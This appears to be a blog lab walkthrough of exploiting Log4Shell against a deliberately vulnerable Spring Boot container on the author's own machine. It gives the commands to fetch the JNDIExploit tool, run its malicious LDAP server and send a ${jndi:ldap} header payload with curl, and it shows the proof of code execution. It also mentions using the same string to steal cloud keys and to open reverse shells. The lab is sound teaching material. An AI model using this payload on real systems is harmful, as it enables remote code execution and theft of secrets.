A recently discovered vulnerability in the popular java logging tool Apache Log4j has been made public and the Internet is lit up like the proveriabe Christmas Tree! You can read up on Log4Shell over at Lunasec. There is also a list on Github showing the vulnerable web applications and vendors. But we’re here for the lab so lets get to it!

Disclaimer – as always only do this against a host you have explicit permission to do so with. Like your own lab, silly.

1 x Kali Linux VM, updated etc. Kali VM ip is in this example.
Install docker
Download the JINDIExploit
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip

Run the vulnerable Spring Boot web application:
sudo docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

1. Make sure the docker spring boot web application is running.
sudo docker ps
2. Open a terminal window, setup the JINDIExploit malicous LDAP server:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i -p 8888
2. Open a termminal tab and run the exploit:
curl -H 'X-Api-Version: ${jndi:ldap://}'
This will execute touch /tmp/pwned on the vulnerable web app.
3. Verify:
$sudo docker exec vulnerable-app ls -la /tmp
total 20
drwxrwxrwt 1 root root 4096 Dec 12 16:08 .
drwxr-xr-x 1 root root 4096 Dec 12 15:42 ..
drwxr-xr-x 2 root root 4096 Dec 12 15:43 hsperfdata_root
-rw-r–r– 1 root root 0 Dec 12 16:08 pwned

Annnd its done. This exploit is being used in all kinds of creative ways. The above is just a vanilla example. See this twitter link where an attacker can serialise the jindi ldap string for secret environment variables and keys (GCP, AWS etc). I’ve also seen examples of a reverse shell with netcat.

The patch is out for log4j, the issue is so many web apps and vendors have to roll fixes individually.